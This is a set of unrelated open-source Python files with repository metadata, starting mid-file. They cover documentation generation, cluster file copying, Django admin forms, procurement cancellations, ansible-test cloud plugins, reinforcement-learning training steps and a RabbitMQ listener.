sections = OrderedDict()
find_sections(md_ast, sections, last, last_class, markdown.count("\n") + 1)
md_chunks = {}
for index, py_file in enumerate(py_files):
py_path = py_paths[index]
with open(os.path.join(py_path), 'rb') as f:
code = f.read().decode('utf-8')
module_ast = ast.parse(code, filename=py_file)
code_lines = list(code.splitlines())
for node in ast.iter_child_nodes(module_ast):
walk_ast(node, code_lines, sections, md_chunks)
added_lines = 0
def _replace_md(key, sections, md_chunk, md_lines, added_lines):
start, end = sections[key]
start -= 1
start += added_lines
end += added_lines
new_lines = md_chunk.split('\n')
added_lines += len(new_lines) - (end - start)
# Ensure a newline above each class header
if start > 0 and md_lines[start][0:4] == '### ' and md_lines[start - 1][0:1] == '>':
added_lines += 1
new_lines.insert(0, '')
md_lines[start:end] = new_lines
return added_lines
for key in sections:
if key not in md_chunks:
raise ValueError('No documentation found for %s' % key[1])
added_lines = _replace_md(key, sections, md_chunks[key], md_lines, added_lines)
markdown = '\n'.join(md_lines).strip() + '\n'
if original_markdown != markdown:
with open(md_file, 'wb') as f:
f.write(markdown.encode('utf-8'))
if __name__ == '__main__':
run()
|
kak-bo-che/certvalidator
|
dev/api_docs.py
|
Python
|
mit
| 14,979
|
import asyncio
from concurrent.futures import ProcessPoolExecutor
print('running async test')
def say_boo():
i = 0
while True:
print('...boo {0}'.format(i))
i += 1
def say_baa():
i = 0
while True:
print('...baa {0}'.format(i))
i += 1
if __name__ == "__main__":
executor = ProcessPoolExecutor(2)
loop = asyncio.get_event_loop()
boo = asyncio.ensure_future(loop.run_in_executor(executor, say_boo))
baa = asyncio.ensure_future(loop.run_in_executor(executor, say_baa))
loop.run_forever()
|
fs714/ipyexample
|
asynchronous/py36/asyncio/example02.py
|
Python
|
apache-2.0
| 557
|
# Copyright 2009-2014 Justin Riley
#
# This file is part of StarCluster.
#
# StarCluster is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# StarCluster is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with StarCluster. If not, see <http://www.gnu.org/licenses/>.
import glob
from starcluster import exception
from completers import ClusterCompleter
class CmdGet(ClusterCompleter):
"""
get [options] <cluster_tag> [<remote_file_or_dir> ...] <local_destination>
Copy one or more files from a running cluster to your local machine
Examples:
# Copy a file or dir from the master as root
$ starcluster get mycluster /path/on/remote/server /local/file/or/dir
# Copy a file and a dir from the master as root
$ starcluster get mycluster /remote/file /remote/dir /local/dir
# Copy a file or dir from the master as normal user
$ starcluster get mycluster --user myuser /remote/path /local/path
# Copy a file or dir from a node (node001 in this example)
$ starcluster get mycluster --node node001 /remote/path /local/path
"""
names = ['get']
def addopts(self, parser):
parser.add_option("-u", "--user", dest="user", default=None,
help="Transfer files as USER ")
parser.add_option("-n", "--node", dest="node", default="master",
help="Transfer files from NODE (defaults to master)")
def execute(self, args):
if len(args) < 3:
self.parser.error("please specify a cluster, remote file or " +
"directory, and a local destination path")
ctag = args[0]
lpath = args[-1]
rpaths = args[1:-1]
cl = self.cm.get_cluster(ctag, load_receipt=False)
node = cl.get_node(self.opts.node)
if self.opts.user:
node.ssh.switch_user(self.opts.user)
for rpath in rpaths:
if not glob.has_magic(rpath) and not node.ssh.path_exists(rpath):
raise exception.BaseException(
"Remote file or directory does not exist: %s" % rpath)
node.ssh.get(rpaths, lpath)
|
cjh1/StarCluster
|
starcluster/commands/get.py
|
Python
|
gpl-3.0
| 2,628
|
#!/usr/bin/env python3
import sys
import os
import path_utils
import fsquery
import mvtools_exception
def puaq():
print("Usage: %s folder" % path_utils.basename_filtered(__file__))
sys.exit(1)
def insert_pragma(path):
exts = ["h"]
v, r = fsquery.makecontentlist(path, True, False, True, False, False, False, True, exts)
if not v:
raise mvtools_exception.mvtools_exception(r)
ret = r
pragma_str = "\n#ifdef __GNUC__\n#pragma GCC system_header\n#endif\n"
failed_bucket = [] #currently unused
for r in ret:
contents = pragma_str
with open(r) as f:
contents += f.read()
with open(r, "w") as f:
f.write(contents)
if len(failed_bucket) > 0:
print("There were failures!")
for fb in failed_bucket:
print("%s failed." % fb)
else:
print("All done - no errors detected")
if __name__ == "__main__":
if len(sys.argv) < 2:
puaq()
else:
insert_pragma(sys.argv[1])
|
mvendra/mvtools
|
insert_pragma.py
|
Python
|
mit
| 1,020
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import codecs
from setuptools import setup
with codecs.open(
os.path.join(os.path.dirname(__file__), 'README.rst'), 'r', 'utf8',
) as ld_file:
long_description = ld_file.read()
setup (
name = 'doit-cmd',
version = '0.1.0',
author = 'Eduardo Naufel Schettino',
author_email = 'schettino72@gmail.com',
description = 'Helper to create doit tasks that execute a command',
long_description = long_description,
url = 'https://github.com/pydoit/doit-cmd/',
keywords = ['doit',],
platforms = ['any'],
license = 'MIT',
py_modules = ['doitcmd'],
install_requires = ['doit'],
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
|
pydoit/doit-cmd
|
setup.py
|
Python
|
mit
| 1,238
|
# -*- coding: utf-8 -*-
from openprocurement.api.utils import (
json_view,
context_unpack,
APIResource,
get_now,
raise_operation_error
)
from openprocurement.tender.core.utils import (
save_tender, optendersresource, apply_patch,
)
from openprocurement.tender.belowthreshold.utils import (
add_next_award
)
from openprocurement.tender.core.validation import (
validate_cancellation_data,
validate_patch_cancellation_data,
)
@optendersresource(name='belowThreshold:Tender Cancellations',
collection_path='/tenders/{tender_id}/cancellations',
path='/tenders/{tender_id}/cancellations/{cancellation_id}',
procurementMethodType='belowThreshold',
description="Tender cancellations")
class TenderCancellationResource(APIResource):
def cancel_tender(self):
tender = self.request.validated['tender']
if tender.status in ['active.tendering', 'active.auction']:
tender.bids = []
tender.status = 'cancelled'
def cancel_lot(self, cancellation=None):
if not cancellation:
cancellation = self.context
tender = self.request.validated['tender']
[setattr(i, 'status', 'cancelled') for i in tender.lots if i.id == cancellation.relatedLot]
statuses = set([lot.status for lot in tender.lots])
if statuses == set(['cancelled']):
self.cancel_tender()
elif not statuses.difference(set(['unsuccessful', 'cancelled'])):
tender.status = 'unsuccessful'
elif not statuses.difference(set(['complete', 'unsuccessful', 'cancelled'])):
tender.status = 'complete'
if tender.status == 'active.auction' and all([
i.auctionPeriod and i.auctionPeriod.endDate
for i in self.request.validated['tender'].lots
if i.numberOfBids > 1 and i.status == 'active'
]):
add_next_award(self.request)
def validate_cancellation(self, operation):
""" TODO move validators
This class is inherited in openua, openeu, limited packages, but validate_cancellation function has different validators.
For now, we have no way to use different validators on methods according to procedure type.
"""
tender = self.request.validated['tender']
if tender.status in ['complete', 'cancelled', 'unsuccessful']:
raise_operation_error(self.request, 'Can\'t {} cancellation in current ({}) tender status'.format(operation, tender.status))
cancellation = self.request.validated['cancellation']
cancellation.date = get_now()
if any([i.status != 'active' for i in tender.lots if i.id == cancellation.relatedLot]):
raise_operation_error(self.request, 'Can {} cancellation only in active lot status'.format(operation))
return True
@json_view(content_type="application/json", validators=(validate_cancellation_data,), permission='edit_tender')
def collection_post(self):
"""Post a cancellation
"""
if not self.validate_cancellation('add'):
return
cancellation = self.request.validated['cancellation']
cancellation.date = get_now()
if cancellation.relatedLot and cancellation.status == 'active':
self.cancel_lot(cancellation)
elif cancellation.status == 'active':
self.cancel_tender()
self.request.context.cancellations.append(cancellation)
if save_tender(self.request):
self.LOGGER.info('Created tender cancellation {}'.format(cancellation.id),
extra=context_unpack(self.request, {'MESSAGE_ID': 'tender_cancellation_create'}, {'cancellation_id': cancellation.id}))
self.request.response.status = 201
self.request.response.headers['Location'] = self.request.route_url('{}:Tender Cancellations'.format(self.request.validated['tender'].procurementMethodType), tender_id=self.request.validated['tender_id'], cancellation_id=cancellation.id)
return {'data': cancellation.serialize("view")}
@json_view(permission='view_tender')
def collection_get(self):
"""List cancellations
"""
return {'data': [i.serialize("view") for i in self.request.validated['tender'].cancellations]}
@json_view(permission='view_tender')
def get(self):
"""Retrieving the cancellation
"""
return {'data': self.request.validated['cancellation'].serialize("view")}
@json_view(content_type="application/json", validators=(validate_patch_cancellation_data,), permission='edit_tender')
def patch(self):
"""Post a cancellation resolution
"""
if not self.validate_cancellation('update'):
return
apply_patch(self.request, save=False, src=self.request.context.serialize())
if self.request.context.relatedLot and self.request.context.status == 'active':
self.cancel_lot()
elif self.request.context.status == 'active':
self.cancel_tender()
if save_tender(self.request):
self.LOGGER.info('Updated tender cancellation {}'.format(self.request.context.id),
extra=context_unpack(self.request, {'MESSAGE_ID': 'tender_cancellation_patch'}))
return {'data': self.request.context.serialize("view")}
|
openprocurement/openprocurement.tender.belowthreshold
|
openprocurement/tender/belowthreshold/views/cancellation.py
|
Python
|
apache-2.0
| 5,411
|
# ~*~ coding: utf-8 ~*~
from django import forms
from datetimewidget.widgets import DateTimeWidget
from django.utils.translation import ugettext_lazy as _
from django.forms import formset_factory
from django.forms.models import modelformset_factory, inlineformset_factory
from virtenviro.content.models import *
import codecs
from django.conf import settings
__author__ = 'Kamo Petrosyan'
class PagesAdminForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(PagesAdminForm, self).__init__(*args, **kwargs)
self.fields['parent'].queryset = Page.objects.filter(is_category=True)
class Meta:
model = Page
exclude = ['last_modified']
widgets = {
'title': forms.TextInput(attrs={'placeholder': _('Title'), 'class': "form-control"}),
'slug': forms.TextInput(attrs={'placeholder': _('Slug'), 'class': "form-control"}),
'template': forms.Select(attrs={'class': "form-control"}),
'parent': forms.Select(attrs={'class': "form-control"}),
'ordering': forms.NumberInput(attrs={'class': "form-control", 'min': 0}),
'pub_datetime': DateTimeWidget(attrs={'id': "id_pub_datetime"}, usel10n=True, bootstrap_version=3),
'last_modified_by': forms.Select(attrs={'disabled': 'disabled', 'class': 'form-control disabled'})
}
def clean_parent(self):
parent = self.cleaned_data.get('parent')
if not parent:
parent = None
return parent
class ContentAdminForm(forms.ModelForm):
class Meta:
model = Content
widgets = {
'title': forms.TextInput(attrs={'placeholder': _('Title'), 'class': "form-control"}),
'h1': forms.TextInput(attrs={'placeholder': _('H1'), 'class': "form-control"}),
'intro': forms.Textarea(attrs={'placeholder': _('Intro text'), 'class': 'form-control', 'rows': 4}),
'content': forms.Textarea(attrs={'placeholder': _('Intro text'), 'class': 'ckeditor'}),
'template': forms.Select(attrs={'class': "form-control"}),
'language': forms.Select(attrs={'class': "form-control disabled"}),
'meta_title': forms.TextInput(attrs={'placeholder': _('Meta title'), 'class': "form-control"}),
'meta_keywords': forms.Textarea(
attrs={'placeholder': _('Meta keywords'), 'class': 'form-control', 'rows': 2}),
'meta_description': forms.Textarea(
attrs={'placeholder': _('Meta description'), 'class': 'form-control', 'rows': 2}),
'author': forms.Select(attrs={'class': 'form-control'}),
'pub_datetime': DateTimeWidget(attrs={'class': 'form-control'}, usel10n=True, bootstrap_version=3),
'last_modified_by': forms.Select(attrs={'disabled': 'disabled', 'class': 'form-control disabled'})
}
exclude = ['parent']
class Media:
css = {'all': ('/static/css/ckeditor.css',)}
js = (
'/static/ckeditor/ckeditor.js',
'/static/filebrowser/js/FB_CKEditor.js',
'/static/js/ckeditor.js',
)
class TemplateAdminForm(forms.ModelForm):
code = forms.CharField(widget=forms.Textarea(attrs={'placeholder': _('Code'), 'class': 'form-control', 'rows': 20}))
def __init__(self, *args, **kwargs):
super(TemplateAdminForm, self).__init__(*args, **kwargs)
try:
template_file = codecs.open(os.path.join(settings.TEMPLATES[0]['DIRS'][0], self.instance.filename),
'r', 'utf-8')
self.fields['code'].initial = template_file.read()
template_file.close()
except:
self.fields['code'].initial = ''
def save(self, force_insert=False, force_update=False, commit=True):
instance = super(TemplateAdminForm, self).save(commit=False)
code = self.cleaned_data['code']
template_file = codecs.open(os.path.join(settings.TEMPLATES[0]['DIRS'][0], self.cleaned_data['filename']),
'w', 'utf-8')
template_file.write(code)
template_file.close()
if commit:
instance.save()
return instance
class Meta:
model = Template
widgets = {
'title': forms.TextInput(attrs={'placeholder': _('Title'), 'class': "form-control"}),
'filename': forms.TextInput(attrs={'placeholder': _('File name'), 'class': "form-control"}),
'parent': forms.Select(attrs={'class': "form-control"}),
}
fields = ['title', 'filename', 'parent', 'code']
ContentAdminFormset = inlineformset_factory(
Page,
Content,
form=ContentAdminForm,
extra=len(settings.LANGUAGES),
exclude=['last_modified'])
|
Haikson/virtenviro
|
virtenviro/content/admin_forms.py
|
Python
|
apache-2.0
| 4,786
|
from random import randint
from sys import argv
if __name__ == '__main__':
components_count = int(argv[1])
max_vectors_count = int(argv[2])
high_bound = int(argv[3])
file_name = argv[4]
result = set()
for i in range(max_vectors_count):
result.add(tuple(randint(0, high_bound) for i in range(components_count)))
with open(file_name, 'w') as out:
out.write('{}\n'.format(components_count))
for item in result:
out.write('\t'.join((str(x) for x in item)) + '\n')
|
vanashimko/k-means
|
generator.py
|
Python
|
mit
| 526
|
"""Plugin system for cloud providers and environments for use in integration tests."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import abc
import atexit
import datetime
import json
import time
import os
import platform
import random
import re
import tempfile
from .. import types as t
from ..util import (
ApplicationError,
display,
is_shippable,
import_plugins,
load_plugins,
ABC,
to_bytes,
make_dirs,
ANSIBLE_TEST_CONFIG_ROOT,
)
from ..target import (
TestTarget,
)
from ..config import (
IntegrationConfig,
)
from ..data import (
data_context,
)
PROVIDERS = {}
ENVIRONMENTS = {}
def initialize_cloud_plugins():
"""Import cloud plugins and load them into the plugin dictionaries."""
import_plugins('cloud')
load_plugins(CloudProvider, PROVIDERS)
load_plugins(CloudEnvironment, ENVIRONMENTS)
def get_cloud_platforms(args, targets=None):
"""
:type args: TestConfig
:type targets: tuple[IntegrationTarget] | None
:rtype: list[str]
"""
if isinstance(args, IntegrationConfig):
if args.list_targets:
return []
if targets is None:
cloud_platforms = set(args.metadata.cloud_config or [])
else:
cloud_platforms = set(get_cloud_platform(target) for target in targets)
cloud_platforms.discard(None)
return sorted(cloud_platforms)
def get_cloud_platform(target):
"""
:type target: IntegrationTarget
:rtype: str | None
"""
cloud_platforms = set(a.split('/')[1] for a in target.aliases if a.startswith('cloud/') and a.endswith('/') and a != 'cloud/')
if not cloud_platforms:
return None
if len(cloud_platforms) == 1:
cloud_platform = cloud_platforms.pop()
if cloud_platform not in PROVIDERS:
raise ApplicationError('Target %s aliases contains unknown cloud platform: %s' % (target.name, cloud_platform))
return cloud_platform
raise ApplicationError('Target %s aliases contains multiple cloud platforms: %s' % (target.name, ', '.join(sorted(cloud_platforms))))
def get_cloud_providers(args, targets=None):
"""
:type args: IntegrationConfig
:type targets: tuple[IntegrationTarget] | None
:rtype: list[CloudProvider]
"""
return [PROVIDERS[p](args) for p in get_cloud_platforms(args, targets)]
def get_cloud_environment(args, target):
"""
:type args: IntegrationConfig
:type target: IntegrationTarget
:rtype: CloudEnvironment
"""
cloud_platform = get_cloud_platform(target)
if not cloud_platform:
return None
return ENVIRONMENTS[cloud_platform](args)
def cloud_filter(args, targets):
"""
:type args: IntegrationConfig
:type targets: tuple[IntegrationTarget]
:return: list[str]
"""
if args.metadata.cloud_config is not None:
return [] # cloud filter already performed prior to delegation
exclude = []
for provider in get_cloud_providers(args, targets):
provider.filter(targets, exclude)
return exclude
def cloud_init(args, targets):
"""
:type args: IntegrationConfig
:type targets: tuple[IntegrationTarget]
"""
if args.metadata.cloud_config is not None:
return # cloud configuration already established prior to delegation
args.metadata.cloud_config = {}
results = {}
for provider in get_cloud_providers(args, targets):
args.metadata.cloud_config[provider.platform] = {}
start_time = time.time()
provider.setup()
end_time = time.time()
results[provider.platform] = dict(
platform=provider.platform,
setup_seconds=int(end_time - start_time),
targets=[target.name for target in targets],
)
if not args.explain and results:
results_path = 'test/results/data/%s-%s.json' % (args.command, re.sub(r'[^0-9]', '-', str(datetime.datetime.utcnow().replace(microsecond=0))))
data = dict(
clouds=results,
)
make_dirs(os.path.dirname(results_path))
with open(results_path, 'w') as results_fd:
results_fd.write(json.dumps(data, sort_keys=True, indent=4))
class CloudBase(ABC):
"""Base class for cloud plugins."""
__metaclass__ = abc.ABCMeta
_CONFIG_PATH = 'config_path'
_RESOURCE_PREFIX = 'resource_prefix'
_MANAGED = 'managed'
_SETUP_EXECUTED = 'setup_executed'
def __init__(self, args):
"""
:type args: IntegrationConfig
"""
self.args = args
self.platform = self.__module__.split('.')[-1]
def config_callback(files): # type: (t.List[t.Tuple[str, str]]) -> None
"""Add the config file to the payload file list."""
if self._get_cloud_config(self._CONFIG_PATH, ''):
if data_context().content.collection:
working_path = data_context().content.collection.directory
else:
working_path = ''
pair = (self.config_path, os.path.join(working_path, os.path.relpath(self.config_path, data_context().content.root)))
if pair not in files:
display.info('Including %s config: %s -> %s' % (self.platform, pair[0], pair[1]), verbosity=3)
files.append(pair)
data_context().register_payload_callback(config_callback)
@property
def setup_executed(self):
"""
:rtype: bool
"""
return self._get_cloud_config(self._SETUP_EXECUTED, False)
@setup_executed.setter
def setup_executed(self, value):
"""
:type value: bool
"""
self._set_cloud_config(self._SETUP_EXECUTED, value)
@property
def config_path(self):
"""
:rtype: str
"""
return os.path.join(data_context().content.root, self._get_cloud_config(self._CONFIG_PATH))
@config_path.setter
def config_path(self, value):
"""
:type value: str
"""
self._set_cloud_config(self._CONFIG_PATH, value)
@property
def resource_prefix(self):
"""
:rtype: str
"""
return self._get_cloud_config(self._RESOURCE_PREFIX)
@resource_prefix.setter
def resource_prefix(self, value):
"""
:type value: str
"""
self._set_cloud_config(self._RESOURCE_PREFIX, value)
@property
def managed(self):
"""
:rtype: bool
"""
return self._get_cloud_config(self._MANAGED)
@managed.setter
def managed(self, value):
"""
:type value: bool
"""
self._set_cloud_config(self._MANAGED, value)
def _get_cloud_config(self, key, default=None):
"""
:type key: str
:type default: str | int | bool | None
:rtype: str | int | bool
"""
if default is not None:
return self.args.metadata.cloud_config[self.platform].get(key, default)
return self.args.metadata.cloud_config[self.platform][key]
def _set_cloud_config(self, key, value):
"""
:type key: str
:type value: str | int | bool
"""
self.args.metadata.cloud_config[self.platform][key] = value
class CloudProvider(CloudBase):
"""Base class for cloud provider plugins. Sets up cloud resources before delegation."""
TEST_DIR = 'test/integration'
def __init__(self, args, config_extension='.ini'):
"""
:type args: IntegrationConfig
:type config_extension: str
"""
super(CloudProvider, self).__init__(args)
self.remove_config = False
self.config_static_name = 'cloud-config-%s%s' % (self.platform, config_extension)
self.config_static_path = os.path.join(self.TEST_DIR, self.config_static_name)
self.config_template_path = os.path.join(ANSIBLE_TEST_CONFIG_ROOT, '%s.template' % self.config_static_name)
self.config_extension = config_extension
def filter(self, targets, exclude):
"""Filter out the cloud tests when the necessary config and resources are not available.
:type targets: tuple[TestTarget]
:type exclude: list[str]
"""
skip = 'cloud/%s/' % self.platform
skipped = [target.name for target in targets if skip in target.aliases]
if skipped:
exclude.append(skip)
display.warning('Excluding tests marked "%s" which require config (see "%s"): %s'
% (skip.rstrip('/'), self.config_template_path, ', '.join(skipped)))
def setup(self):
"""Setup the cloud resource before delegation and register a cleanup callback."""
self.resource_prefix = self._generate_resource_prefix()
atexit.register(self.cleanup)
# pylint: disable=locally-disabled, no-self-use
def get_remote_ssh_options(self):
"""Get any additional options needed when delegating tests to a remote instance via SSH.
:rtype: list[str]
"""
return []
# pylint: disable=locally-disabled, no-self-use
def get_docker_run_options(self):
"""Get any additional options needed when delegating tests to a docker container.
:rtype: list[str]
"""
return []
def cleanup(self):
"""Clean up the cloud resource and any temporary configuration files after tests complete."""
if self.remove_config:
os.remove(self.config_path)
def _use_static_config(self):
"""
:rtype: bool
"""
if os.path.isfile(self.config_static_path):
display.info('Using existing %s cloud config: %s' % (self.platform, self.config_static_path), verbosity=1)
self.config_path = self.config_static_path
static = True
else:
static = False
self.managed = not static
return static
def _write_config(self, content):
"""
:type content: str
"""
prefix = '%s-' % os.path.splitext(os.path.basename(self.config_static_path))[0]
with tempfile.NamedTemporaryFile(dir=self.TEST_DIR, prefix=prefix, suffix=self.config_extension, delete=False) as config_fd:
filename = os.path.join(self.TEST_DIR, os.path.basename(config_fd.name))
self.config_path = filename
self.remove_config = True
display.info('>>> Config: %s\n%s' % (filename, content.strip()), verbosity=3)
config_fd.write(to_bytes(content))
config_fd.flush()
def _read_config_template(self):
"""
:rtype: str
"""
with open(self.config_template_path, 'r') as template_fd:
lines = template_fd.read().splitlines()
lines = [l for l in lines if not l.startswith('#')]
config = '\n'.join(lines).strip() + '\n'
return config
@staticmethod
def _populate_config_template(template, values):
"""
:type template: str
:type values: dict[str, str]
:rtype: str
"""
for key in sorted(values):
value = values[key]
template = template.replace('@%s' % key, value)
return template
@staticmethod
def _generate_resource_prefix():
"""
:rtype: str
"""
if is_shippable():
return 'shippable-%s-%s' % (
os.environ['SHIPPABLE_BUILD_NUMBER'],
os.environ['SHIPPABLE_JOB_NUMBER'],
)
node = re.sub(r'[^a-zA-Z0-9]+', '-', platform.node().split('.')[0]).lower()
return 'ansible-test-%s-%d' % (node, random.randint(10000000, 99999999))
class CloudEnvironment(CloudBase):
"""Base class for cloud environment plugins. Updates integration test environment after delegation."""
def setup_once(self):
"""Run setup if it has not already been run."""
if self.setup_executed:
return
self.setup()
self.setup_executed = True
def setup(self):
"""Setup which should be done once per environment instead of once per test target."""
@abc.abstractmethod
def get_environment_config(self):
"""
:rtype: CloudEnvironmentConfig
"""
def on_failure(self, target, tries):
"""
:type target: IntegrationTarget
:type tries: int
"""
class CloudEnvironmentConfig:
"""Configuration for the environment."""
def __init__(self, env_vars=None, ansible_vars=None, module_defaults=None, callback_plugins=None):
"""
:type env_vars: dict[str, str] | None
:type ansible_vars: dict[str, any] | None
:type module_defaults: dict[str, dict[str, any]] | None
:type callback_plugins: list[str] | None
"""
self.env_vars = env_vars
self.ansible_vars = ansible_vars
self.module_defaults = module_defaults
self.callback_plugins = callback_plugins
|
aperigault/ansible
|
test/lib/ansible_test/_internal/cloud/__init__.py
|
Python
|
gpl-3.0
| 13,034
|
# Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r""""""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import os
import time
import tensorflow as tf
import gin.tf
flags = tf.app.flags
flags.DEFINE_multi_string('config_file', None,
'List of paths to the config files.')
flags.DEFINE_multi_string('params', None,
'Newline separated list of Gin parameter bindings.')
flags.DEFINE_string('train_dir', None,
'Directory for writing logs/summaries during training.')
flags.DEFINE_string('master', 'local',
'BNS name of the TensorFlow master to use.')
flags.DEFINE_integer('task', 0, 'task id')
flags.DEFINE_integer('save_interval_secs', 300, 'The frequency at which '
'checkpoints are saved, in seconds.')
flags.DEFINE_integer('save_summaries_secs', 30, 'The frequency at which '
'summaries are saved, in seconds.')
flags.DEFINE_boolean('summarize_gradients', False,
'Whether to generate gradient summaries.')
FLAGS = flags.FLAGS
TrainOps = namedtuple('TrainOps',
['train_op', 'meta_train_op', 'collect_experience_op'])
class TrainStep(object):
"""Handles training step."""
def __init__(self,
max_number_of_steps=0,
num_updates_per_observation=1,
num_collect_per_update=1,
num_collect_per_meta_update=1,
log_every_n_steps=1,
policy_save_fn=None,
save_policy_every_n_steps=0,
should_stop_early=None):
"""Returns a function that is executed at each step of slim training.
Args:
max_number_of_steps: Optional maximum number of train steps to take.
num_updates_per_observation: Number of updates per observation.
log_every_n_steps: The frequency, in terms of global steps, that the loss
and global step and logged.
policy_save_fn: A tf.Saver().save function to save the policy.
save_policy_every_n_steps: How frequently to save the policy.
should_stop_early: Optional hook to report whether training should stop.
Raises:
ValueError: If policy_save_fn is not provided when
save_policy_every_n_steps > 0.
"""
if save_policy_every_n_steps and policy_save_fn is None:
raise ValueError(
'policy_save_fn is required when save_policy_every_n_steps > 0')
self.max_number_of_steps = max_number_of_steps
self.num_updates_per_observation = num_updates_per_observation
self.num_collect_per_update = num_collect_per_update
self.num_collect_per_meta_update = num_collect_per_meta_update
self.log_every_n_steps = log_every_n_steps
self.policy_save_fn = policy_save_fn
self.save_policy_every_n_steps = save_policy_every_n_steps
self.should_stop_early = should_stop_early
self.last_global_step_val = 0
self.train_op_fn = None
self.collect_and_train_fn = None
tf.logging.info('Training for %d max_number_of_steps',
self.max_number_of_steps)
def train_step(self, sess, train_ops, global_step, _):
"""This function will be called at each step of training.
This represents one step of the DDPG algorithm and can include:
1. collect a <state, action, reward, next_state> transition
2. update the target network
3. train the actor
4. train the critic
Args:
sess: A Tensorflow session.
train_ops: A DdpgTrainOps tuple of train ops to run.
global_step: The global step.
Returns:
A scalar total loss.
A boolean should stop.
"""
start_time = time.time()
if self.train_op_fn is None:
self.train_op_fn = sess.make_callable([train_ops.train_op, global_step])
self.meta_train_op_fn = sess.make_callable([train_ops.meta_train_op, global_step])
self.collect_fn = sess.make_callable([train_ops.collect_experience_op, global_step])
self.collect_and_train_fn = sess.make_callable(
[train_ops.train_op, global_step, train_ops.collect_experience_op])
self.collect_and_meta_train_fn = sess.make_callable(
[train_ops.meta_train_op, global_step, train_ops.collect_experience_op])
for _ in range(self.num_collect_per_update - 1):
self.collect_fn()
for _ in range(self.num_updates_per_observation - 1):
self.train_op_fn()
total_loss, global_step_val, _ = self.collect_and_train_fn()
if (global_step_val // self.num_collect_per_meta_update !=
self.last_global_step_val // self.num_collect_per_meta_update):
self.meta_train_op_fn()
time_elapsed = time.time() - start_time
should_stop = False
if self.max_number_of_steps:
should_stop = global_step_val >= self.max_number_of_steps
if global_step_val != self.last_global_step_val:
if (self.save_policy_every_n_steps and
global_step_val // self.save_policy_every_n_steps !=
self.last_global_step_val // self.save_policy_every_n_steps):
self.policy_save_fn(sess)
if (self.log_every_n_steps and
global_step_val % self.log_every_n_steps == 0):
tf.logging.info(
'global step %d: loss = %.4f (%.3f sec/step) (%d steps/sec)',
global_step_val, total_loss, time_elapsed, 1 / time_elapsed)
self.last_global_step_val = global_step_val
stop_early = bool(self.should_stop_early and self.should_stop_early())
return total_loss, should_stop or stop_early
def create_counter_summaries(counters):
"""Add named summaries to counters, a list of tuples (name, counter)."""
if counters:
with tf.name_scope('Counters/'):
for name, counter in counters:
tf.summary.scalar(name, counter)
def gen_debug_batch_summaries(batch):
"""Generates summaries for the sampled replay batch."""
states, actions, rewards, _, next_states = batch
with tf.name_scope('batch'):
for s in range(states.get_shape()[-1]):
tf.summary.histogram('states_%d' % s, states[:, s])
for s in range(states.get_shape()[-1]):
tf.summary.histogram('next_states_%d' % s, next_states[:, s])
for a in range(actions.get_shape()[-1]):
tf.summary.histogram('actions_%d' % a, actions[:, a])
tf.summary.histogram('rewards', rewards)
|
tombstone/models
|
research/efficient-hrl/train_utils.py
|
Python
|
apache-2.0
| 7,027
|
import json
import pika
import time
import threading
from flask import current_app
from listenbrainz.webserver import create_app
from listenbrainz.webserver.views.api_tools import LISTEN_TYPE_PLAYING_NOW
from listenbrainz.mbid_mapping_writer.job_queue import MappingJobQueue
class MBIDMappingWriter(threading.Thread):
""" Main entry point for the mapping writer. Sets up connections and
handles messages from RabbitMQ and stuff them into the queue for the
job matcher to handle."""
def __init__(self, app):
threading.Thread.__init__(self)
self.app = app
self.queue = None
def callback(self, channel, method, properties, body):
listens = json.loads(body)
self.queue.add_new_listens(listens)
channel.basic_ack(method.delivery_tag)
def create_and_bind_exchange_and_queue(self, channel, exchange, queue):
channel.exchange_declare(exchange=exchange, exchange_type='fanout')
channel.queue_declare(callback=lambda x: None,
queue=queue, durable=True)
channel.queue_bind(callback=lambda x: None,
exchange=exchange, queue=queue)
def on_open_callback(self, channel):
self.create_and_bind_exchange_and_queue(
channel, current_app.config['UNIQUE_EXCHANGE'], current_app.config['UNIQUE_QUEUE'])
channel.basic_consume(
queue=current_app.config['UNIQUE_QUEUE'], on_message_callback=self.callback)
def on_open(self, connection):
connection.channel(on_open_callback=self.on_open_callback)
def init_rabbitmq_connection(self):
while True:
try:
credentials = pika.PlainCredentials(
current_app.config['RABBITMQ_USERNAME'], current_app.config['RABBITMQ_PASSWORD'])
connection_parameters = pika.ConnectionParameters(
host=current_app.config['RABBITMQ_HOST'],
port=current_app.config['RABBITMQ_PORT'],
virtual_host=current_app.config['RABBITMQ_VHOST'],
credentials=credentials,
)
self.connection = pika.SelectConnection(
parameters=connection_parameters, on_open_callback=self.on_open)
break
except Exception as e:
current_app.logger.error(
"Error while connecting to RabbitMQ: %s", str(e), exc_info=True)
time.sleep(3)
def run(self):
with self.app.app_context():
current_app.logger.info("Starting queue stuffer...")
self.queue = MappingJobQueue(app)
# start the queue stuffer thread
self.queue.start()
while True:
current_app.logger.info("Starting MBID mapping writer...")
self.init_rabbitmq_connection()
try:
self.connection.ioloop.start()
except KeyboardInterrupt:
self.submit_delivery_tags()
self.queue.terminate()
current_app.logger.error("Keyboard interrupt!")
break
except Exception as e:
current_app.logger.error(
"Error in MBID Mapping Writer: %s", str(e), exc_info=True)
time.sleep(3)
